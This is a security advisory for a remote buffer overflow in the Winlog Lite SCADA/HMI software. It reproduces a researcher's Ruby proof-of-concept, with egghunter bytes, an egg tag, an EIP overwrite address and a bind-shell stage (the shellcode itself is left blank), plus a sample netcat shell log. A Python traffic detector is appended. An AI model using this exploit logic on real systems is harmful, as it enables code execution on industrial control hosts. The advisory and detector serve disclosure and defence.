Affected Systems:
Sielco Sistemi Winlog Lite 2.07.14
Description:
--------------------------------------------------------------------------------
BugTraq ID: 53811
Winlog Lite is the entry-level version of the Winlog Pro SCADA/HMI software from Sielco Sistemi. It lets users evaluate the capabilities and ease of use of the package and also serves as a solution for building small supervisory applications.
Winlog Lite has a remote buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code.
<* Source: m1k3 (m1k3@s3cur1ty_de)
Link: http://www.securityfocus.com/archive/1/522974
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedure (method) may be offensive in nature and is intended for security research and teaching only. Use it at your own risk!
m1k3 provides the following test method:
# Exploit:
# root@bt:~/msf-scripts# ruby runtime-exploit-01.rb
# placing the shellcode
# sleeping...
# kicking...
# buffer length: 261
# root@bt:~/msf-scripts# netcat -v 10.8.28.37 4444
# 10.8.28.37: inverse host lookup failed: Unknown server error: Connection timed out
# (UNKNOWN) [10.8.28.37] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\All Users\Application Data\Winlog Lite\Projects\Ceramics Kiln\Template>
#
# Important:
# -> The reliability of your exploit depends on that path...
#    If you choose another default project or you start another project, this path is not reliable anymore.
#    You can choose the default project during installation. I have used Ceramics Kiln.
require 'socket'
port = "46824"
host = "10.8.28.37"
s = TCPSocket.open(host, port)
sleep(0.5)
# Generic NtAccessCheckAndAuditAlarm egghunter; searches memory for the tag "woot" twice ("wootwoot")
egghunter =  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter << "\xef\xb8\x77\x6f\x6f\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# msfpayload windows/shell_bind_tcp R | msfencode -t ruby
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# placeholder: the 368 encoded bytes produced by the command above go here
# (the copy in this advisory is garbled and incomplete and is not reproduced)
shellcode = ""
# Stage 1: plant the egg (tag + shellcode) somewhere in process memory
puts "placing the shellcode"
buffer = "\x41" * 2000
buffer << "wootwoot"   # egg
buffer << "\x90"
buffer << shellcode
buffer << "\x90" * 2000
print "buffer length: #{buffer.length}\r\n"
s.puts(buffer)
puts "sleeping ..."
sleep(5)
# Stage 2: overflow the stack buffer, overwrite EIP and land in the egghunter
puts "kicking ..."
buffer = "\x41" * 20 + "\x14" * 10 + "\x41" * 167
buffer << "\xdf\x53\x51\x40"   # EIP -> jmp esp - Vclx40.bpl - 0x405153df
buffer << "\x90"
buffer << egghunter
buffer << "\x90" * (59 - egghunter.length)
print "buffer length: #{buffer.length}\r\n"
s.puts(buffer)
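As an added example (not part of the advisory or the original PoC), a heuristic that flags captured payloads to the Winlog Lite port carrying the shape of the two-stage overflow above, for use in a detection pipeline. The port, egg tag and egghunter bytes come from the PoC; the length threshold, filler ratio and sample packets are constructed assumptions.

```python
"""Heuristic detector for the Winlog Lite overflow traffic described above.
Added example, not part of the advisory. Assumptions (constructed): the
service listens on TCP 46824 and legitimate requests are short; the
thresholds below are illustrative, not vendor-documented."""

WINLOG_PORT = 46824
# Byte patterns taken from the advisory's PoC: the egg tag the hunter searches
# for and the first bytes of the generic egghunter stub.
EGG_TAG = b"wootwoot"
EGGHUNTER_PREFIX = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
MAX_SANE_LEN = 200    # assumption: legitimate requests are far shorter than this
FILLER_RATIO = 0.5    # share of one repeated byte value that looks like padding


def filler_ratio(payload: bytes) -> float:
    """Share of the payload taken by its most common byte value."""
    if not payload:
        return 0.0
    return max(payload.count(bytes([b])) for b in set(payload)) / len(payload)


def classify_payload(dst_port: int, payload: bytes) -> list:
    """Return the reasons this packet looks like the overflow attempt (empty = clean)."""
    reasons = []
    if dst_port != WINLOG_PORT:
        return reasons
    if EGG_TAG in payload:
        reasons.append("egg tag present")
    if EGGHUNTER_PREFIX in payload:
        reasons.append("egghunter stub present")
    if len(payload) > MAX_SANE_LEN and filler_ratio(payload) > FILLER_RATIO:
        reasons.append("oversized request dominated by filler bytes")
    return reasons


# Constructed samples: a short benign request and the two stages of the PoC shape
# (the 368-byte shellcode is replaced by NOPs in the stage 1 sample).
BENIGN = b"GET_TAGS\r\n"
STAGE1 = b"A" * 2000 + EGG_TAG + b"\x90" * 369 + b"\x90" * 2000
STAGE2 = b"A" * 197 + b"\xdf\x53\x51\x40" + b"\x90" + EGGHUNTER_PREFIX + b"\x90" * 47

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("stage1", STAGE1), ("stage2", STAGE2)):
        print(name, classify_payload(WINLOG_PORT, pkt) or "clean")
```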
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sielco Sistemi
-------------
At the time of writing the vendor has not released a patch or upgraded version. Users of this software are advised to watch the vendor's homepage for an updated release:
http://www.sielcosistemi.com/en/download/public/winlog_lite.html